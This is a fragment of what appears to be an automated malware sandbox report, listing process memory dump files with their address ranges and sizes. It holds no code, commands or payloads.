                                                                                                                                                                            • memory/1816-89-0x0000000000268000-0x00000000002CC000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              400KB

                                                                                                                                                                            • memory/1816-86-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1816-92-0x0000000000400000-0x0000000000886000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4.5MB

                                                                                                                                                                            • memory/1816-101-0x0000000000268000-0x00000000002CC000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              400KB

                                                                                                                                                                            • memory/1816-135-0x0000000000400000-0x0000000000886000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4.5MB

                                                                                                                                                                            • memory/1880-59-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1880-88-0x0000000000DC0000-0x0000000000DCE000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              56KB

                                                                                                                                                                            • memory/1888-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1896-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1896-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1908-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1916-140-0x000007FEFB981000-0x000007FEFB983000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              8KB

                                                                                                                                                                            • memory/1916-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1924-102-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1972-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1976-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1976-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1976-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1984-78-0x0000000004240000-0x000000000425F000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              124KB

                                                                                                                                                                            • memory/1984-76-0x0000000004210000-0x000000000422F000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              124KB

                                                                                                                                                                            • memory/1984-75-0x0000000005870000-0x0000000006B83000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              19.1MB

                                                                                                                                                                            • memory/1984-71-0x0000000005870000-0x0000000006B83000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              19.1MB

                                                                                                                                                                            • memory/1984-69-0x0000000005870000-0x0000000006B83000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              19.1MB

                                                                                                                                                                            • memory/1984-54-0x0000000075691000-0x0000000075693000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              8KB

                                                                                                                                                                            • memory/2040-113-0x0000000000000000-mapping.dmp